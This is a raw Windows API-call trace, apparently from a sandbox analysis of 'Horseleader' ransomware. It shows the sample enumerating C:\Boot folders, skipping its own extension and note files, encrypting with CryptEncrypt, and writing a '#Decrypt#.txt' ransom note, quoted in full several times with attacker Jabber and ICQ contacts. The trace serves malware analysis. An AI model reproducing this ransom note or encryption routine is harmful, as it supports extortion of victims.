pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0121.664] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.664] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.664] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.665] lstrlenW (lpString=".testttjffg") returned 11 [0121.665] StrStrW (lpFirst="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.665] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.665] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.665] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.666] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\#Decrypt#.txt") returned 31 [0121.666] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\#Decrypt#.txt" (normalized: "c:\\boot\\cs-cz\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.666] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.666] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.668] lstrlenA (lpString="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") returned 1368 [0121.668] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.668] CloseHandle (hObject=0x200) returned 1 [0121.668] GetProcessHeap () returned 0x780000 [0121.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.669] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="da-DK", cAlternateFileName="")) returned 1 [0121.669] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0121.669] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0121.669] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0121.669] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0121.669] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.669] GetProcessHeap () returned 0x780000 [0121.670] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.670] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0121.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.670] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.670] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0121.670] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.671] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.671] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.671] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0121.671] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.671] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.671] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.671] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0121.671] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.671] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.672] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.672] lstrlenW (lpString=".testttjffg") returned 11 [0121.672] StrStrW (lpFirst="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.672] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.672] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.672] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.682] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.682] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.682] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\#Decrypt#.txt") returned 31 [0121.682] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\#Decrypt#.txt" (normalized: "c:\\boot\\da-dk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.683] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.683] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.687] lstrlenA (lpString="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") returned 1368 [0121.688] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.688] CloseHandle (hObject=0x200) returned 1 [0121.688] GetProcessHeap () returned 0x780000 [0121.689] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.689] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="de-DE", cAlternateFileName="")) returned 1 [0121.689] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0121.689] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0121.689] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0121.689] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0121.689] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\de-DE", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.690] GetProcessHeap () returned 0x780000 [0121.690] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.690] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0121.690] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.691] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.691] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0121.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.691] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.691] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.691] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0121.691] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.691] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0121.692] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.692] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0121.692] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.692] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.692] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.692] lstrlenW (lpString=".testttjffg") returned 11 [0121.692] StrStrW (lpFirst="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.693] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.693] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.693] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.693] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\#Decrypt#.txt") returned 31 [0121.694] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\#Decrypt#.txt" (normalized: "c:\\boot\\de-de\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.694] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.694] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.696] lstrlenA (lpString="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") returned 1368 [0121.696] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.696] CloseHandle (hObject=0x200) returned 1 [0121.696] GetProcessHeap () returned 0x780000 [0121.697] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.697] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="el-GR", cAlternateFileName="")) returned 1 [0121.697] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0121.697] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0121.697] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0121.697] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0121.697] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.697] GetProcessHeap () returned 0x780000 [0121.697] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.698] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0121.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.698] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.698] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0121.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.699] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.699] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.699] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0121.699] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.699] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.699] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.699] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0121.700] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.700] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.700] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.700] lstrlenW (lpString=".testttjffg") returned 11 [0121.700] StrStrW (lpFirst="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.700] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.700] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.707] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, 
